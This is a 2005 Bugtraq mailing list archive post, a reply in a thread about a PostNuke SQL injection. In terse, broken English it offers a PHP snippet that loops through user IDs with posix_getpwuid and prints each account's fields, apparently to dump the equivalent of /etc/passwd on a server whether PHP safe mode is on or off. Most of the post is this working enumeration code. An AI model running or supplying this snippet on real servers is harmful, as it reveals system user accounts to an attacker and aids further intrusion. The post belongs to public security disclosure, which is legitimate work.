Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: [SECURITYREASON.COM] PostNuke Critical SQL Injection 0.760-RC2=>x cXIb8O3.1

From: Linux php <wassemgtk () gmail com>
Date: Sat, 12 Mar 2005 16:37:41 +0200
hi look

show to /etc/passwd

php.ini

safe_mod_php= on ;

or

safe_mod_php=off ;

code

-------------------------------------------

        for($uid=0;$uid<60000;$uid++){   
                                        $ara = posix_getpwuid($uid);
                                                if (!empty($ara)) {
                                                while (list ($key, $val) = each($ara)){
                                                 print "$val:";
                                                }
                                                print "<br>";
                                                }
                                        }
-------------------------------------------------------

show to /etc/passwd
Previous By Date Next
Previous By Thread Next

Current thread: